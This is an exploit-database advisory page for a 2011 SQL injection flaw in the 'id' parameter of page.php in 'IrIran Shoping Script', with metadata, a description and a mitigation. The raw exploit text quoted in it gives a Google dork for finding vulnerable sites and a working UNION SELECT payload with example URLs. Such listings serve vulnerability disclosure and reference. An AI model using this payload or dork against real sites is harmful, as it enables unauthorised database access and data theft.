IrIran Shoping Script SQL Injection Vulnerability

vendor:

IrIran Shoping Script

by:

Net.Edit0r

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: IrIran Shoping Script

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/php

2011

IrIran Shoping Script SQL Injection Vulnerability

An SQL injection vulnerability exists in IrIran Shoping Script, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited to gain access to sensitive information, modify data, or even execute system commands. The vulnerability is caused due to the improper sanitization of user-supplied input in the 'id' parameter of the 'page.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

==========================================
IrIran Shoping Script SQL Injection Vulnerability
==========================================

[~]######################################### InformatioN
#############################################[~]

[~] Title     : IrIran Shoping Script SQL Injection Vulnerability
[~] Author    : Net.Edit0r
[~] Vendor or Software Link  : http://www.iriran.net
[~] Email     : Black.hat.tm@gmail.com
[~] Data  : 2011-03-29
[~] Google dork: "Powered by: IRIran.net"
[~] Category:  [Webapps]
[~] Tested on: [Linux /php]

[~]#########################################   ExploiT
#############################################[~]

[~] Vulnerable File :

http://127.0.0.1/products/page.php?id=[SQL]

[~] ExploiT         :

-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--

[~] Example         :

http://127.0.0.1/products/page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--

[~] Demo            :

http://site.com/products/page.php?id=-10+UnIoN+SeleCt+1,2,3,4,5,6,7,8,9,10,11--


[~]######################################### ThankS To ...
############################################[~]

[~] Black Hat Group Member  :

Net.Edit0r & DarkCoder & fronk & Amir-MaGic & H3x & Milad.C0nn3ct0r #BHG

[~] IRANIAN Young HackerZ # Persian Gulf

[~]#########################################   FinisH :D
#############################################[~]################[~]